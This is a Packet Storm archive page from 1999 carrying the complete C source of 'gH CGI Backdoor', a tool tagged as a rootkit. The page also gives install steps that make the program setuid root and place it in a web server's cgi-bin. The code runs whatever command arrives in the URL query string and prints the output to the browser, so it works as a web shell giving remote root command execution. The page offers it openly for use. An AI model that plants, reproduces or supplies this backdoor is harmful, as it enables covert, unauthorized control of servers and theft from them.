what you don't know can hurt you

gH-cgi.c

gH-cgi.c
Posted May 1, 1999
Authored by Blasphemy

A simple cgi backdoor which pipes command output to the browser.

tags | tool, cgi, rootkit
systems | unix
MD5 | 2c0331f54922c1b1140e8992598fbb2f

gH-cgi.c

Change Mirror Download
/*
* gH CGI Backdoor 1.0
*
* Install:
* -------------------------------
* % gcc -o gH.cgi gH-cgi.c
* % chown root.root gH.cgi
* % chmod 4755 gH.cgi
* -------------------------------
* Tested with apache 1.3.4
*
* Note: place gH.cgi in a cgi-bin directory
*
* blasphemy (cornoil@netscape.net)
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TITLE "gH CGI Backdoor"

char x2c(char *what);
int header();
int footer();

int
main() {
FILE *out;
char *qs = (char *)malloc(256);
int x = 0, i = 0, c = 0, f = 0;
qs = getenv("QUERY_STRING");
if (qs != NULL) {
for (x = 0, i = 0; qs[i]; x++, i++) {
if ((qs[x] = qs[i]) == '%') {
qs[x] = x2c(&qs[i + 1]);
i += 2;
}
}
qs[x] = '\0';
for (x = 0; qs[x]; x++) {
if (qs[x] == '+') {
qs[x] = ' ';
}
}
header(qs);
out = popen(qs, "r");
if (out != NULL) {
while (c != EOF) {
c = fgetc(out);
if (c != EOF && c != '\0') {
printf("%c", (char) c);
f++;
}
}
pclose(out);
}
if (f == 0 && strcmp(qs, "") != 0)
printf("gH: %s: command not found\n", qs);
}
footer();
return(0);
}

char x2c(char *what)
{
register char digit;

digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
digit *= 16;
digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
return (digit);
}

int
header(char *qs) {
printf("Content-type: text/html\n\n");
printf("<html>\n<head><title>%s</title></head>\n", TITLE);
printf("<body bgcolor=\"#ffffff\">\n");
printf("<dir><h1>%s</h1>\n", TITLE);
printf("<ISINDEX prompt=\"Command to Execute: \">\n");
printf("<br><b>Command output:</b> [<em>%s</em>]\n", qs);
printf("<br><pre>\n");
}

int
footer() {
printf("</pre>\n</dir>\n</body></html>\n");
}
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close